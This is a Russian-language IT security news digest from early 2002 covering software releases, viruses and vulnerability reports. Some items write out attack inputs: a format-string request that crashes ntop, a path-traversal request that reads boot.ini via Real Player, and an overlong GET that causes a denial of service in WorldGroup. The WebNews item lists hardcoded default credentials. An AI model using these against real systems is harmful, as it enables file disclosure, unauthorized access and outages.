Штаты требуют, чтобы версия Windows для продажи была одна-единственная: "модульная", чтобы пользователь сам мог решить, ставить Internet Explorer или нет. Президент Microsoft Стив Баллмер пригрозил даже, что в случае принятия подобных мер компания вообще будет вынуждена снять Windows с рынка. Источник - http://ntvru.com/finance/05Mar2002/ms.html
5/03/2002 Выпущена четвертая бета-версия Mandrake Linux 8.2.
Разработчики дистрибутива на базе открытой операционной системы Linux объявили о выпуске четвертой бета-версии Mandrake Linux 8.2. Как сообщается на сайте Mandrake, версия 8.2 с выпуском очередной беты, практически готова к финальному релизу. Также стало известно, что очередная бета-версия выпущена раньше предполагаемого срока. Источник - http://www.compulenta.ru/news/2002/3/5/26379/
5/03/2002 Обнаружена очередная уязвимость в браузере Internet Explorer.
Израильские специалисты по компьютерной безопасности обнаружили весьма серьезную уязвимость в браузере Internet Explorer. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX. Подробности - http://www.compulenta.ru/news/2002/3/5/26380/
5/03/2002 DoS-уязвимость коммутаторов Hewlett-Packard .
В коммутаторах HP Procurve 4000M Ethernet v C.08.22, C.09.09 обнаружена уязвимость, в результате которой удаленный пользователь может приостановить на некоторое время работу устройства. Проблема возникает, когда удаленный пользователь сканирует порты коммутатора и заключается в том, что после сканирования 23-й порт (telnet) на несколько минут прекращает принимать новые подключения. Компания Hewlett-Packard была уведомлена о существовании данной проблемы, но решения пока не предоставила. Источник - http://www.securitytracker.com
5/03/2002 Появился новый вирус для платформы .Net .
Несколько дней назад ведущие антивирусные компании сообщили о появлении вируса Sharpei, написанного на языке Microsoft C# и поражающего системы, работающие с .Net framework. Антивирусная компания Network Associates оценила уровень опасности вируса как низкий, но отметила, что это уже второй случай появления вируса для платформы .Net. Проявляет себя Sharpei как обычный интернет-червь, рассылая свои копии по всем адресам Outlook, после чего удаляет все письма из папки "отправленные". Компания Microsoft пока не прокомментировала данный инцидент. Подробности - http://news.com.com
5/03/2002 Множественное переполнение буфера в CFS .
В файловой системе Cryptographic File System (CFS) для ОС Linux и UNIX обнаружена множественная уязвимость переполнения буфера, в результате которой удаленный пользователь может вызвать крах CFS. Информации о том, существует ли возможность выполнять произвольный код на атакуемой системе с использованием данной уязвимости, пока нет. Источник - http://www.securitytracker.com/alerts/2002/Mar/1003717.html
5/03/2002 Java апплет может перенаправлять трафик броузера .
4 марта компания Microsoft выпустила бюллетень по безопасности, сообщающий об уязвимости виртуальной машины (VM) Microsoft. Виртуальная машина, поставляемая с Internet Explorer версий 4.x и 5.x содержит дыру в защите, которая заключается в некорректной обработке Java запросов к ресурсам через прокси сервер. Злоумышленник с помощью Java апплета может перенаправить информацию пользовательского сеанса работы с Интернет на сервер по своему выбору. Уязвимости подвержены лишь те системы, в которых в настройках Internet Explorer установлено соединение через прокси сервер. Компания Microsoft классифицировала данную уязвимость как критичную для клиентских систем Бюллетень и патч - http://www.microsoft.com/technet/security/bulletin/ms02-013.asp
5/03/2002 Уязвимости во многих реализациях RADIUS.
Как сообщает координационный центр CERT, в RADIUS (Remote Authentication Dial In User Service) обнаружена уязвимость, использование которой приводит к DoS (Denial of Service) и в редких случаях (необходимо знание shared secret между клиентом и сервером) к возможности выполнения кода на компьютере жертвы. RADIUS применяется во многих системах и многими производителями для авторизации, аутентификации и организации удалённого доступа клиентам, работающим по RADIUS-протоколу. Ошибки заключаются в неправильном вычислении message digests (не проверяется размер буффера у цели передачи пакета) и неправильном оперировании с полем vendor-length атрибута vendor-specific.Уязвимостям присвоены коды VU#589523 и VU#936683. Ошибки в RADIUS есть в следующих продуктах: Ascend RADIUS versions 1.16, Cistron RADIUS versions 1.6.5 , FreeRADIUS versions 0.3, GnuRADIUS versions 0.95, ICRADIUS versions 0.18.1, Livingston RADIUS versions 2.1, RADIUS (previously known as Lucent RADIUS) versions 2.1, RADIUSClient versions 0.3.1, XTRADIUS 1.1-pre1, YARD RADIUS 1.0.19. CERT выражает благодарность за обнаруженную уязвимость 3APA3A (http://www.security.nnov.ru/) и Joshua Hill Источник - http://www.cert.org/advisories/CA-2002-06.html Подробное описание уязвимости - http://www.security.nnov.ru/advisories/radius.asp
5/03/2002 Очередной багофикс Apache-SSL.
Как мы вчера сообщали, вышел очередной релиз Apache-SSL c вервией "Апача" 1.3.22 и mod_ssl модулем (поддержка криптованного канала SSL) 1.46. Как написал автор Ben Laurie в сегодняшнем послании в BUGTRAQ и список рассылки Apache SSL Announce, он несколько поторопился и выпустил неработоспособную версию. Он исправил свою ошибку и выпустил релиз Apache-SSL 1.3.22+1.47. Релиз доступен для скачивания из обычных источников. Сервер Apache-SSL - http://www.apache-ssl.org/
5/03/2002 Уязвимость в утилите ntop.
Обнаружена уязвимость в утилите-ntop, аналоге top для анализа использования сети. Уязвимость обнаружена в исходном коде этой программы и является уязвимостью типа "формата строки" (format string vulnerability). Используя эту уязвимость злоумышленник может удалённо выполнить на машине жертвы несанкционированную программу. Один из простейших пример использования состоит в следующем. Если ntop запущен с ключём -w - активизируется доступ к информации ntop через HTTP (порт 3000). Посылка запроса вида - GET /%s%s%s HTTP/1.0 - приведёт к прерыванию ntop. Уязвимости подвержена *nix-версия утилиты, Win32-версия пока не проверялась. Источник - http://www.securityfocus.com
5/03/2002 Shellcode Detector.
В BUGTRAQ Dragos Ruiu из Sourcefire Inc. опубликовал исходный текст детектора для определения "мутантных руткитов". Приводим описание этого детектора в авторском контексте. "It should detect any ordinary shellcode that has NOP sleds even it it is not polymorphically mutated, as well as codes mutated with K2's ADMmutate." Фактически этот детектор является препроцессором для популярного пакета IDS (Intrusion Detection Syctem) snort (автор-Martin Roesch), применяемого во многих *nix-системах для определения попыток вторжения. Детектор работает с snort версии выше 1.7. Полное название утилиты - "spp_fnord: snort preprocessor - Multi-architecture mutated NOP sled detector". Исходник доступен здесь - http://cansecwest.com/spp_fnord.c
5/03/2002 Два интересных документа:.
Kernel Based Keylogger Создание клавиатурного шпиона под ядро *nix платформ. http://phreedom.org/article.php?id=28
Weaknesses in the CHAP protocol as used within PPP and PPTP Обход аутентикации в PPTP протоколе, который так широко используется университетами и прочими учреждениями в беспроводных сетях. http://packetstormsecurity.nl/groups/teso/chap.pdf
5/03/2002 John The Ripper 1.6.31 DEV.
Вышла новая версия самого известного и лучшего подборщика UNIX паролей. Что нового в этой версии: HP-UX tcb files support has been added, the default wordlist rules have been made Y2K-aware, and various minor fixes have been applied. Скачать новую версию можно здесь: http://www.openwall.com/john/
4/03/2002 Загрузка произвольных файлов на диск MacOS пользователя.
Различные браузеры для MacOS и MacOS X в Classic Mode позволяют злонамеренным web-страницам автоматически загружать произвольные файлы на компьютер уязвимого пользователя. Уязвимость может быть реализована с помощью META refresh тэг, подобно следующему: Уязвимость найдена в iCab Company iCab Pre 2.7-2.71 Microsoft Internet Explorer Macintosh Edition 4.5-5.0 Netscape 4.77-4.78 MAC Источник - http://securitylab.ru/?ID=29201
4/03/2002 Неавторизованный доступ в Tiny Personal Firewall.
Проблема, найденная в Tiny Personal Firewall, позволяет местному нападающему получить неправомочный доступ к программе. Это возможно, когда местная система блокирована. Пользователь, просматривающий сеть, может инициализировать аварийный диалог с блокированной рабочей станцией с установленной межсетевой защитой. Диалоговое окно требует, чтобы пользователь или разрешил или запретил ввод. Если рабочая станция автоматическая, местный нападающий может выбрать Ичточник - http://securitylab.ru/?ID=29208
4/03/2002 Некорректная обработка имен вложений в почтовом клиенте The Bat!.
В почтовом клиенте The Bat! обнаружена уязвимость, вызывающая зависание приложения. Возникает она в том случае, если имя файла вложения совпадает с именем некоторого MS DOS устройства, например CON, AUX, PRN, NUL. Проблема актуальна только при включенной опции хранения вложений вне тела сообщения ("Keep attachment files separately"). Источник - http://securitylab.ru
4/03/2002 DoS-уязвимость коммутаторов Hewlett-Packard .
В коммутаторах HP Procurve 4000M Ethernet v C.08.22, C.09.09 обнаружена уязвимость, в результате которой удаленный пользователь может приостановить на некоторое время работу устройства. Проблема возникает, когда удаленный пользователь сканирует порты коммутатора и заключается в том, что после сканирования 23-й порт (telnet) на несколько минут прекращает принимать новые подключения. Компания Hewlett-Packard была уведомлена о существовании данной проблемы, но решения пока не предоставила. Источник - http://www.securitytracker.com
4/03/2002 Kernel Traffic #156.
Очередное недельное обозрение популярнейшей рассылки разработчиков ядра Linux LKML. Ознакомиться - http://kt.zork.net/kernel-traffic/kt20020304_156.html
4/03/2002 Выход Linux 2.4.18-ac3.
На этот раз Алан занялся пордолжением доведения до ума уже вышедшей версии... На сегодня: исправления в smbfs nls, убрана мертвая блокировка квот, исправлена работа c таймингом в piix4. Скачать - patch-2.4.18-ac3.gz
4/03/2002 Бундестаг переходит на Linux.
По сообщениям из информированных источников, начиная с 2003-его года Бундестаг планирует полностью перейти на операционную систему Linux, тем самым разрывая свои отношения с корпорацией Microsoft. Подробности - http://www.heise.de/english/newsticker/data/anw-28.02.02-006/
4/03/2002 Выпущено обновление для дистрибутивов Red Hat Linux, решающее проблемы с уязвимостями в PHP.
Компания Red Hat подготовила обновления для собственных дистрибутивов на базе открытой операционной системы Linux. Обновление решает проблемы с рядом уязвимостей, обнаруженных ранее в скриптовом языке PHP. Разработчики PHP сообщили об обнаружении сразу нескольких уязвимостей, с использованием которых имеется возможность запуска исполняемого кода на удаленной машине. Подробности - http://www.compulenta.ru/news/2002/3/4/26321/
4/03/2002 6 марта ожидается новый удар со стороны вируса Klez.e.
Шестого числа каждого нечетного месяца (а следовательно, и шестого марта 2002 года) вирус Klez.e активизирует свою деструктивную функцию и предпринимает попытку заполнить все файлы на винчестере зараженного компьютера случайным содержимым. После этого файлы уже невозможно восстановить. Источник - http://www.compulenta.ru/news/2002/3/4/26309/
4/03/2002 Завершена разработка браузера Mozilla 0.9.9.
1 марта разработчики браузера Mozilla закончили работу над очередной версией программы 0.9.9, через неделю после запланированного срока. Версия 0.9.9 - это последний релиз браузера перед столь ожидаемым релизом 1.0, выпуск которого запланирован на апрель. На сайте разработчиков программы версия 0.9.9 должна появится на следующей неделе. Источник - http://www.compulenta.ru/news/2002/3/4/26318/
4/03/2002 "Баг" в Real Player.
Как указал в BUGTRAQ некий ome1 в популярной программе Real Player существует уязвимость, позволяющая при определённом стечении обстоятельств просматривать содержимое файлов "жертвы". Предлагается следующая последовательность действий. Открываем определённый real-media-файл: File->Open File... выбираем некий файл-например, c:\music\file.ram. После этого: View ---> Clip Source. Real Palyer открывает URL вида: http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram, при этом Real Player открывает порт 1275 TCP (что-то наподобие своего мини-Вэб-сервера). Если после этого соединиться удалённо к этой машине и выполнить команду вида: GET http://127.0.0.1:1275/../../../../../boot.ini - будет выведено содержимое этого файла. Автор тестировал версию 6.0.7. Для проверки запущенного сервиса была использована команда fport |grep real. Источник - http://www.securityfocus.com
4/03/2002 Обновление Apache-SSL.
После опубликования в списке рассылки BUGTRAQ уязвимости в модуле mod_ssl (поддержка Secure Socket Layer) выпущена новая версия Apach-SSL-1.3.22+1.46 (то есть версия "Апача" 1.3.22 с SSL-модулем 1.46). Описание уязвимости - http://archives.neohapsis.com/archives/bugtraq/2002-02/0313.html Обновлённая версия Apache-SSL - ftp://opensores.thebunker.net/pub/mirrors/apache-ssl/apache_1.3.22+ssl_1.46.tar.gz
3/03/2002 Обновление программы: Access Denied ScreenSaver 1.3.
Обновился процесс и алгоритм изменения и проверки пароля, теперь не должно возникать никаких проблем с проверкой пароля. ВНИМАНИЕ: В связи с обновлением алгоритма шифрования пароля, перед установкой новой версии Access Denied ScreenSaver удалите файл access.ini из папки MS Windows. Скачать новую версию можно здесь: http://www.uinc.ru/scripts/load.cgi?files/agapov25/accessd.exe
3/03/2002 Microsoft открывает коды.
Руководство корпорации Microsoft объявило, что отныне "интеграторы" из 150 крупнейших компьютерных компаний (таких как Compaq и Avanade) получат доступ ко всем исходным кодам новых версий систем Windows и .NET. Подробности - http://www.nuvse.com/first/FB3?SR=2&LG=2&NWT=63&NWI=45975
3/03/2002 JFS официально включена в ядро.
Вышла новая промежуточная версия ядра линукс 2.5.6-pre2, в которую вошла JFS. Это уже третья по счету журналируемая файловая система в ядре. Источник - http://www.linux.org.ru
3/03/2002 Выход Gaim 0.53.
Сегодня вышла новая версия популярного ICQ клона под Linux. Новый релиз включает в себя множество нововведений в работе с протоколом OSCAR, а также улучшение интерфейса. ChangeLog - http://gaim.sourceforge.net/ChangeLog Сайт Gaim - http://gaim.sourceforge.net/
2/03/2002 Появился первый вирус, написанный на новом языке Microsoft С#.
В пятницу антивирусные компании сообщили о появлении первого компьютерного вируса, написанного с использованием новейшего языка Microsoft С#, который является важным компонентом архитектуры .Net и своеобразным ответом Microsoft на Java. Новый вирус, названный своим создателем Sharpei, предназначен, в первую очередь, для поражения компьютеров, использующих элементы рабочей среды .Net. По сути, он является очередным почтовым червем, маскирующимся под обновлением для Windows. В строке темы письма находится фраза " Important: Windows update" (важно: обновление Windows), а в теле письма сообщается, что обновление ускоряет работу ОС на 50% и повышает безопасность системы. При запуске вложенного файла вирус рассылает свои копии по адресам из книги Outlook, а затем очищает папку "Отправленные" (Sent) и удаляет самого себя. Если пораженный компьютер работает под управлением Windows XP или другой поддерживающей .Net системы, то дополнительно заражаются файлы в 4 папках, при открытии которых вирус активируется вновь. Источник - http://www.compulenta.ru/news/2002/3/2/26248/
2/03/2002 Коммерческая компания впервые привлекается к суду за нарушение лицензии GNU.
В ближайшее время Универсальной общественной лицензии GNU (GNU GPL) предстоит пройти первое испытание в суде. Компания MySQL AB, создатель свободно распространяемой системы управления базами данных MySQL подала иск против корпорации Progress Software. NuSphere, дочерняя структура Progress занимается распространением программного продукта Gemini, связанного с основным кодом MySQL, с нарушением лицензии. Источник - http://www.compulenta.ru/news/2002/2/27/26052/
1/03/2002 У Линуса Торвальдса проблемы с обновлением ядра Linux?.
27 февраля на конференции британской Unix Users Group директор компании VA и президент Open Source Initiative Эрик Реймонд выступил с речью, в которой заявил, что система обновления ядра открытой операционной системы Linux в настоящее время находится в кризисном состоянии, что может отразиться на дальнейшей судьбе открытого проекта.Присоединившись к ряду других специалистов, выразивших свое недовольство системой обновления ядра, Рэймонд предложил Линусу Торвальдсу выбрать программиста, который помогал бы ему в деле обновления ядра Linux. Реймонд считает, что Торвальдс уже не справляется с резко возросшим в последнее время объемом необходимых обновлений, присылаемых сообществом разработчиков. Многие патчи ядра Linux, без всяких на то причин, игнорируются Торвальдсом, хотя большинство из них идет на пользу развитию открытой операционной системы. Источник - http://www.compulenta.ru/news/2002/3/1/26194/
1/03/2002 В "диком виде" появился новый червь.
Антивирусная компания Sophos предупреждает своих пользователей о появлении в "диком виде" нового интернет-червя VBS/Britney-A. Распространяется червь посредством электронных писем, предлагающих посмотреть фотографии Britney Spears, и содержащих вложение BRITNEY.CHM. При активизации червь рассылает себя по всем адресам Outlook Express и через Internet Relay Chat. Никаких деструктивных функций вирус не содержит. Источник - http://www.sophos.com
1/03/2002 Уязвимость сервера приложений Oracle 9iAS.
Координационный цент CERT сообщает об уязвимости сервера приложений Oracle 9iAS. Уязвимость позволяет удаленному пользователю просматривать исходные коды CGI-скриптов, находящихся в директории cgi-bin. Проблема заключается в том, что в конфигурационном файле Apache в Oracle 9iAS по умолчанию установлен псевдоним "/perl" на "/cgi-bin". А вследствие того, что этот псевдоним не определен как ScriptAlias, файлы, запрашиваемые через "/perl", не интерпретируются как скрипты и не выполняются, а просто выводятся на экран. Компания Oracle пока не предоставила решения данной проблемы. По материалам - http://www.securitytracker.com
1/03/2002 Ошибка в Real Player для Win2K может привести компьютер в "нерабоспособное" состояние.
Как указал в списке рассылки BUGTRAQ NtWaK0 если в системе с ОС Win2K установлен Real Player как плагин по умолчанию при запуске MP3-файлов-существует возможность привести машину в "нерабоспособное" состояние (то есть привести к 100% загрузки процессора). Для этого надо: 1. Переименовать любой не MP3-файл (например, virus.exe) в file.mp3, 2. Cоздать HTML-страницу, с которой этот файл открывается-test.html, 3. Положить file.mp3 и test.html на Вэб-сервер, 4. Запустить URL-http://www.your_host.com/test.html. В итоге, процессор при открытии этого файла будет занят на 100%. Как указывает автор, этого не случается, если в качестве приложения для запуска MP3-файла применяется WinAMP. Пример эксплоита - http://www.safehack.com/testpage/test1.htm
1/03/2002 Уязвимость в сервере WorldGroup 3.x.
Группа Limpid Byte (http://lbyte.void.ru) cовместно с SECURITY.NNOV обнаружили уязимость в FTP и Web-сервере WorldGroup 3.x, выпускаемом Galacticomm (http://www.gcomm.com/). FTP-сервер при приёме длинной команды LIST, а Web-сервер при приёме длинной команды вида GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0 подвержены переполнению буфера, что приводит к DoS. Исходники программы для Win32 - http://www.security.nnov.ru/files/worldgroupdos.zip
1/03/2002 Выпущено обновления PHP-версия 4.1.2 доступна для скачивания.
Как сообщалось ранее, в языке скприптов PHP обаружена уязвимость, позволяющая злоумышленнику запускать свои команды с привилегиями собственника процесса Вэб-сервера. Уязвимость присутствует в функции php_mime_split. CERT выпустил информационный бюллетень, в котором рекомендует администраторам проапгрейдить свой PHP до версии 4.1.2. Поскольку язык PHP используется на многих Вэб-серверах (Apache, IIS, Caudium,Netscape, iPlanet, OmniHTTPd и т.д.) эта уязвимость представляет серьёзную опасность. В случае невозможности обновления рекомендуется убрать поддержку file_uploads, для чего в файле php.ini выставить: file_uploads = off. Информационный бюллетень CERT - http://www.cert.org/advisories/CA-2002-05.html Описание уязвимости - http://security.e-matters.de/advisories/012002.html Новая версия PHP - http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz
28/02/2002 Red Hat выпускает бета-версию дистрибутива Red Hat Linux: Pensacola.
Компания Red Hat выпустила бета-версию дистрибутива на базе открытой операционной системы - Red Hat Linux: Pensacola. Отличительной особенностью данного дистрибутива является его ориентация на работу в серверах. Данный релиз является бета-версией и компания не рекомендует выполнять под ним ответственные задачи. Дистрибутив Pensacola отличается от более раннего Red Hat Linux 7.2 (Enigma) по двум параметрам: расширенная технология кластеризации, и настройка ядра Linux специально для работы в серверах. Загрузить новую версию дистрибутива Red Hat Linux можно на ftp-сайте компании. Источник - http://www.compulenta.ru/news/2002/2/28/26146/
28/02/2002 Red Hat предупреждает о необходимости обновления ядра Linux.
Компания Red Hat сообщает об обнаружении уязвимости в одной из компонент встроенного в ядро Linux брандмауэра. Данная уязвимость актуальна для пользователей Red Hat Linux версий 7.1 и 7.2. Служба "IRC Connection Tracking" не активирована в установке Linux по определению, однако содержит уязвимость, которая может привести к несанкционированному удаленному подключению к системе. Подробности - http://www.compulenta.ru/news/2002/2/28/26144/
28/02/2002 Обнаружена уязвимость в скриптовом языке PHP.
Разработчики открытого языка скриптов PHP предупреждают об обнаружении уязвимости, которая позволяет злоумышленникам провести DoS-атаку, либо получить навтроизованный доступ к данным во многих системах с установленным веб-сервером Apache и другими веб-серверами. Как стало известно, уязвимость не так-то легко задействовать, однако их использование может привести к неработоспособности сервера, либо к получению полного контроля над удаленной системой. Источник - http://www.compulenta.ru/news/2002/2/28/26149/
28/02/2002 Numgame - деструктивный интернет-червь.
Антивирусная компания Panda Software сообщает об обнаружении нового опасного червя VBS/Numgame. Распространяется вирус, рассылая свои копии по всем адресам Outlook Express. После активации червь удаляет некоторые системные файлы, вносит изменения в реестр Windows и удаляет папки, находящиеся на сетевых дисках. По материалам - http://www.pandasoftware.com.
27/02/2002 Вышла версия 3.0.2 Qt.
В основном посвящена багфиксам. Добавлена работа с оптимизацией посредством objprelink. Для работающих с текущей версией КДЕ3 особых новшеств нет, все отмеченные вами недостатки доработаны. Это обещанная стабильная версия для КДЕ3. Подробности - http://www.trolltech.com/developer/changes/3.0.2.html
27/02/2002 Microsoft выпускает патчи против нескольких "критических" уязвимостей.
Microsoft выпустил патчи против серьезных уязвимостей, обнаруженных в интернет-программах корпорации, а именно в браузере Internet Explorer и XML Core Services 2.6. Позднее выяснилось, что аналогичные проблемы присущи Microsoft SQL Server и Commerce Server 2000. Microsoft рекомендует пользователям скачать и установить эти патчи немедленно, поскольку уязвимости очень серьезные. Тем более, что Internet Explorer поставляется со всеми операционными системами Windows, а XML Core Services - вместе с Windows XP. Источник - http://www.compulenta.ru/news/2002/2/27/26018/
27/02/2002 Уязвимость серверов ScriptEase Web Server Edition.
В Nombas ScriptEase Web Server Edition обнаружена уязвимость, позволяющая удаленному пользователю, запустившему скрипт comment2.jse, просматривать любые файлы, хранящиеся на сервере. Решение проблемы пока не найдено. Подробности - http://www.securitytracker.com
27/02/2002 Вышла бета-версия браузера Opera 6.0 для Linux.
26 февраля вышла новая тестовая бета-версия норвежского браузера Opera для Linux. По заявлению разработчика, Opera 6.0 Beta 1 для Linux призвана обеспечить пользователей операционной системы с открытым кодом быстрым и простым в использовании браузером. В целях расширения присутствия на рынках Азии и Восточной Европы в браузер добавлена поддержка нелатинских алфавитов. В новой версии появилась возможность создавать списки контактов, импортировать закладки и другие файлы, а также использовать многие плагины для Netscape. Полностью обновлена справка к браузеру. Окончательная версия браузера появится через несколько месяцев после выхода версии для Windows. Бесплатная версия браузера Opera снабжена рекламой. Версия без рекламы продается за 39 долларов США. Пользователи платной версии Opera 5.x для Linux могут бесплатно обновить свой браузер до бета-версии 6.0. Обновление для пользователей платной версии Opera 4.x стоит 15 долларов. Cкачать - http://www.opera.com/download/get.pl?platform=linux&force=6.0
27/02/2002 Выпущен патч для Windows 2000/XP, решающий проблему с уязвимостью в протоколе SMTP.
Компания Microsoft выпустила патч для операционных систем Windows 2000 и XP, решающий проблему с уязвимостью, обнаруженной ранее в протоколе SMTP. Уязвимость может быть задействована путем отправки на SMTP-сервер специально составленной команды, что, в результате, приводит к сбою в работе системы. Таким образом, данную уязвимость можно использовать для провдения DoS-атак. Загрузка и установка данного патча должна предотвратить возможность использования данной уязвимости. Интересным фактом является то, что патч для Windows 2000 представлен как часть Windows 2000 Service Pack 3, на основе чего можно сделать вывод о том, что SP3 для этой ОС будет выпущен уже в ближайшее время. Патч для Win2K - http://www.microsoft.com/downloads/release.asp?ReleaseID=36556 Патч для WinXP - http://www.microsoft.com/downloads/release.asp?ReleaseID=36636
27/02/2002 В Macromedia Flash обнаружена еще одна дыра.
В интернете появилась информация о новом уязвимом месте в технологии Macromedia Flash, широко используемой для создания интерактивных анимированных изображений, разного рода баннеров, заставок, игр и т.п. Дыра была обнаружена одним из пользователей Macromedia Flash, который скрывается под псевдонимом Vengy. Угроза исходит от недокументированных функций, содержащихся в инструментарии Macromedia для подготовки роликов в формате Flash 5. По сведениям Vengy, во встроенном скриптовом языке ActionScript есть команда fscommand:save, которая позволяет сохранять значения изменяющихся во времени переменных в отдельный файл. О ней ничего не сказано в документации к Flash 5. Для демонстрации своей находки Vangy создал файл, содержащий троян (правда, совершенно безвредный). Никаких официальных заявлений от Macromedia по поводу уязвимости пока не поступало. Тем не менее, версия Flash Player, которая доступна на сайте компании, уже обновилась с учётом сообщения Vengy. Обновлённая версия Flash Player-а - http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
27/02/2002 MediaPlayer превращает MP3-файлы в зловредные вирусы .
Уязвимое место в медиа-проигрывателях производства Microsoft и RealNetworks может позволить злоумышленникам создавать MP3-файлы, которые запускают браузер без согласия пользователя и активизируют вредоносные скрипты. О таком неприятном открытии сообщил в NewsBytes - журналисты издания прочли о такой возможности на одной из сетевых конференций. В одном из сообщений значилось, что при проигрывании песни лос-анжелесской группы Lifehouse в формате МРЗ встроенный код запускает браузер, который самостоятельно идет на порнографический сайт и открывает попутно неимоверное количество порнографических же поп-апов. В результате небольшого расследования NewsBytes пришел в выводу, что достаточно создать медиа-файл в родном формате любого из двух проигрывателей и переименовать так, чтобы расширение файла стало .mp3. То есть проигрыватель, например Windows Media Player, игнорирует изменение расширения и проигрывает файлы с расширением .МРЗ как родные WMA-файлы. Опасность же заключается в том, что оба производителя встроили в свои форматы функции, позволяющие включать в медиа-презентации гиперссылки на сайты и запускать JavaScript. Таким образом, известные дыры в Internet Explorer, позволяющие запускать компоненты ActiveX и исполняемые команды, можно теперь эксплуатировать, создавая фальшивые МРЗ-файлы. При этом пользователь может даже не заподозрить подвоха, будучи уверенным в том, что он просто проигрывает обычный МРЗ-файл, и ничего не подозревая о таящейся в недрах "медиа-презентации". Подробности - http://www.newsbytes.com/news/02/174747.html
27/02/2002 Сообщать о дырах в ПО нужно будет в установленном порядке .
В Internet Engineering Task Force (IETF) представлены для публичного обсуждения предварительные документы с описанием процедур и правил раскрытия информации об обнаруженных уязвимостях в ПО. Правила предусматривают семидневный срок, в течение которого поставщики обязаны отреагировать на сообщение о дыре. Подробности - http://www.netoscope.ru/news/2002/02/26/4864.html
27/02/2002 Митник пожал руку жертве своего социального инжениринга .
Десять лет назад хакер Кевин Митник с помощью социального инжениринга вынудил одного из сотрудников корпорации Novell, Шоуна Нанли, выдать ему коды доступа к секретной информации о новой ОС, разрабатывавшейся в Novell. На прошлой неделе двое бывших "врагов" встретились на конференции, организованной RSA Security и посвященной компьютерной безопасности. Как передает Reuters, встретились Митник и Нанли очень тепло, крепко пожали друг другу руки и поговорили о прежних временах. Тогда, в 1992 гоу, Митник позвонил в Novell и, представившись сотрудником компании, находящимся сейчас в отпуске, попросил дать ему коды доступа к системе. Такая практика была широко распространена в Novell - сотрудники корпорации могли свободно работать с данными, находясь в отпуске. Митника перенаправили непосредственно к Нанли, так как только он имел право доступа к информации. Позвонив Нанли по телефону домой и представившись сотрудником компании, "хакер номер 1" попросил дать ему код доступа. Нанли согласился дать Митнику коды, но попросил отправить ему на работу голосовое письмо с подтверждением этого запроса для возможного отчета перед руководством. Впоследствии это голосовое письмо было использовано властями в качестве доказательства вины Митника. В Novell Митник хотел получить информацию о системе идентификации пользователей, которая будет применяться в новой ОС. У Митника были далеко идущие планы - он собирался встроить в код операционки "бэкдоор". Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=581&u=/nm/20020221/tc_nm/tech_hacker_dc_2
26/02/2002 Symantec представлет пакет программ "все в одном" для сетевой безопасности.
Компания Symantec объявила о выпуске нового пакета программ для сетевой безопасности, объединяющего в себе сразу несколько программных решений компании. Пакет программ Symantec Gateway Security объединяет в себе возможности брандмауэра, антивирусного ПО, фильтра онлайнового контента и средств работы с виртуальными частными сетями. Выход пакета программ намечен на март этого года. Подробности - http://www.compulenta.ru/news/2002/2/26/26012/
26/02/2002 С точки зрения компьютерной безопасности, 2002 год будет еще хуже, чем 2001.
В своем выступлении на конференции RSA 2002 основатель и исполнительный директор компании SecurityFocus Артур Вонг представил аудитории собственный взгляд на компьютерную безопасность в этом году. Как считает Вонг, в этом году положение значительно ухудшится, по сравнению с 2001 годом. Несмотря на эпидемии вирусов Code Red и Nimda, Вонг считает, что ситуация в прошлом году "могла быть и хуже". Подробности - http://www.compulenta.ru/news/2002/2/26/26002/
26/02/2002 Linux 2.4.18.
Тут же начата работа над ядром 2.4.19-pre1. В котором: добавлен драйвер Permedia3 fb, обновлен код для Alpha и SPARC64, кроме всего прочего куча исправлений в самых различных местах.Почти мгновенно отреагировал и Кокс выпуском 2.4.18-ac1. Его код синхронизирован с rc4, кроме того, добавлен драйвер для устройств LS220/LS240. Опять же Кокс приготовил на десерт 2.2.21pre3. Если посмотреть на список изменений, то видим почти везде слово fix. Есть надежда, что 2.2.21 будет еще лучше, чем 2.2.20. Скачать - http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.18.tar.bz2 Changelog - http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.18
26/02/2002 Netwin WebNews 1.1k.
По данным securityfocus.org, система WebNews предусматривает наличие четырех пользователей, удаление которых невозможно - testweb, alwn3845, alwi3845 и testweb2 с соответствующими паролями - newstest, imaptest, wtest3452, wtest4879. Источник - http://www.securityfocus.org
26/02/2002 Уязвимости в SQUID.
Сразу три уязвимости были обнаружены в SQUID 2.X вплоть до версии 2.4.STABLE3 : утечка памяти при работе с SNMP интерфейсом, возможность удаленного выполнения кода из-за проблем в работе с ftp://адресами, проблема с HTCP интерфейсом. Источник - http://www.squid-cache.org/Advisories/SQUID-2002_1.txt
26/02/2002 Переполнение буфера в Microsoft Internet Explorer.
На этот раз уязвимы все приложения, основанные на HTML rendering engine самого IE. Причина - неправильная обработка директивы EMBED, необходимой для загрузки некоторых объектов в HTML документы. Подробности - http://www.cert.org/advisories/CA-2002-04.html
25/02/2002 Уязвимость интернет-пейджера Yahoo Messenger.
В интернет-пейджере Yahoo Messenger обнаружены серьезные проблемы с безопасностью. Сообщается, что подключившись к 5101-му порту интернет-пейджера, удаленный пользователь способен вызвать переполнение полей "message" и "IMvironment", и, как следствие, зависание приложения. Кроме того, подключение к 5101-му порту позволяет вносить любые изменения в contact-лист пользователя Yahoo Messenger. Подробности - http://www.securitytracker.com
25/02/2002 Обновление статьи: Написание экстра-маленьких Win32 приложений от 1 КБ на С++.
+ В статью добавлен FAQ, возникший в результате множества писем с вопросами + Добавлено несколько ссылок по теме + Добавлен файл с некоторыми функциями, заменяющими RTL аналоги. В частности - работа с heap, памятью, atoi и др. Ознакомиться: http://www.uinc.ru/articles/28/index.shtml
24/02/2002 Выход BitKeeper Kernel Hacking HOWTO.
Jeff Garzik выпустил в LKML первый вариант описания принципов работы с BitKeeper - аналогом CVS для разработчиков ветви ядра Linux 2.5. Источник - http://kerneltrap.com/ Сайт LKML - http://www.tux.org/lkml/
